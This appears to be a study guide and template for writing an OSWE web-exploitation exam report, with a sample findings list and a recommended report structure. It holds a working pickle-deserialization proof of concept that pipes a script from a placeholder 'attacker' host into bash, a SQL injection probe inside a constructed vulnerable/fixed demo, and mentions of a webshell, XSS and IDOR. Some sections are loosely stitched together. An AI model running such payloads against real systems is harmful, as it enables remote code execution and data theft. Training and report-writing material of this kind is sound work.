OSWE Exam Report Work

Part 1: The Philosophical Shift (OSWE vs. OSCP)

| Aspect | OSCP (Penetration Testing) | OSWE (Web Expert) |
| :--- | :--- | :--- |
| Target | Black box | White/grey box (source code given) |
| Proof | Screenshot of whoami / ifconfig | Code snippet + HTTP request demonstrating logic flaw |
| Difficulty | Finding the vulnerability | Exploiting a chain of minor bugs to get RCE |
| Report Enemy | Forgetting a screenshot | Missing the code context |

Your mantra for OSWE: "If it isn't in the source code, it didn't happen."


OSWE Exam Report – Excerpt

Proof of Concept

import base64, pickle, requests

# Any object with __reduce__ is executed by pickle.loads on the server side.
class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ('curl https://attacker/shell.sh | bash',))

# json cannot serialise bytes, so the base64 payload is decoded to str before sending.
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
requests.post('http://target/api/verify', json={'token': payload})

Mistake #2: Missing Source Code References

The error: "I found an SQLi in the search bar."
The fix: "In search.php lines 12-15, the code concatenates $_GET['q'] directly into the query. See Appendix A for the full source dump."
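The fixed wording above cites a concrete concatenation bug. As an added example that is not from the original report or from any exam application, the same pattern and its remediation are written here in Python against an in-memory SQLite table (the table, its rows, the column names and the probe strings are all constructed for illustration) so that a reader can see why citing the concatenation line is the proof: the vulnerable function leaks a row the query is meant to hide, the parameterised one does not.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed catalogue: two public rows and one that the search must never return."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, secret INTEGER)")
    conn.executemany(
        "INSERT INTO items (name, secret) VALUES (?, ?)",
        [("public widget", 0), ("public gadget", 0), ("hidden prototype", 1)],
    )
    conn.commit()
    return conn


def search_vulnerable(conn: sqlite3.Connection, q: str) -> list:
    """The pattern the report should cite: the user-supplied q is spliced into the SQL text.
    This mirrors the $_GET['q'] concatenation described for search.php; the string
    building line itself is the vulnerability."""
    sql = "SELECT name FROM items WHERE secret = 0 AND name LIKE '%" + q + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn: sqlite3.Connection, q: str) -> list:
    """Remediation: the value is bound as a parameter, so the driver never parses it as SQL."""
    sql = "SELECT name FROM items WHERE secret = 0 AND name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + q + "%",))]


def leaks_hidden_rows(search, conn: sqlite3.Connection, probe: str) -> bool:
    """True if the given search function returns a row that secret = 0 should have excluded."""
    hidden = {row[0] for row in conn.execute("SELECT name FROM items WHERE secret = 1")}
    return any(name in hidden for name in search(conn, probe))


if __name__ == "__main__":
    db = make_db()
    probe = "x%' OR 1=1 --"   # constructed probe string: closes the literal, then comments out the rest
    print("benign, vulnerable:", search_vulnerable(db, "widget"))
    print("benign, fixed:     ", search_fixed(db, "widget"))
    print("probe,  vulnerable:", search_vulnerable(db, probe), "leaks:", leaks_hidden_rows(search_vulnerable, db, probe))
    print("probe,  fixed:     ", search_fixed(db, probe), "leaks:", leaks_hidden_rows(search_fixed, db, probe))
```

When writing the finding, the evidence is the concatenation line plus one request/response pair, and the remediation is the parameterised query; both map directly onto the two functions above.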

OSWE-01: Pre-Auth RCE via PHP Type Juggling + Deserialization

File: modules/api/AuthController.php:112-119
Severity: Critical

Executive Summary

Provide a concise overview (3–5 sentences) summarizing the objective, scope, key findings, and overall outcome (pass/fail). Example:
The objective was to identify and exploit web application vulnerabilities on the assigned target to achieve remote code execution and obtain proof-of-exploit flags. During the exam I identified multiple injection and authentication issues, chained an authorization bypass to remote code execution, and captured the required flags. Result: Pass.


Vulnerability Identification

List each vulnerability with title, risk rating, affected endpoint(s), and brief evidence.

  1. Insecure Direct Object Reference (IDOR) — High

    • Endpoint: GET /api/v1/users/{id}
    • Evidence: Accessing /api/v1/users/2 returned private details of user 2 while authenticated as user 3.
    • PoC: curl -H "Authorization: Bearer [token_user3]" https://[target]/api/v1/users/2
  2. Reflected Cross-Site Scripting (XSS) — Medium

    • Endpoint: /search?q=
    • Evidence: Injected payload alert(1) was reflected and executed in the response.
  3. Unrestricted File Upload → Remote Code Execution (RCE) — Critical

    • Endpoint: /uploads/upload.php
    • Evidence: Application allowed uploading PHP files; uploaded webshell executed.
    • PoC steps and artifact: (detailed below)
  4. SQL Injection (Blind) — High

    • Endpoint: /api/v1/items?filter=
    • Evidence: Boolean-based responses changed with payloads; admin credentials enumerated partially.

Structure (recommended order)

  1. Cover page — Exam title, target IP/hostname, testing window, candidate name (if required).
  2. Executive summary (1–2 paragraphs) — Scope, high-level findings, overall success (e.g., achieved RCE on app X), and remediation priority.
  3. Scope & methodology — Targets in-scope, exclusions, tools used, testing types (manual review, source review, fuzzing), and proof constraints.
  4. Credentials & setup — How you accessed the lab (lab creds, VM setup), environment notes, and any non-standard configs.
  5. Walkthrough / Findings — One finding per section, ordered by impact. For each:
    • Title (concise)
    • Impact (brief)
    • Prerequisites (auth, files, environment)
    • Discovery steps (numbered, reproducible)
    • Exploitation steps (numbered, with commands/payloads)
    • Proof (screenshots, command output)
    • Remediation (practical fix)
  6. Full exploit script / final payload — Include the final working exploit script, with usage instructions and any dependencies.
  7. Appendices
    • Raw notes and alternate attempts
    • Tool output (burpsuite logs, request/response with headers)
    • Useful commands and one-liners
    • References

6. Tools Used (Keep it minimal)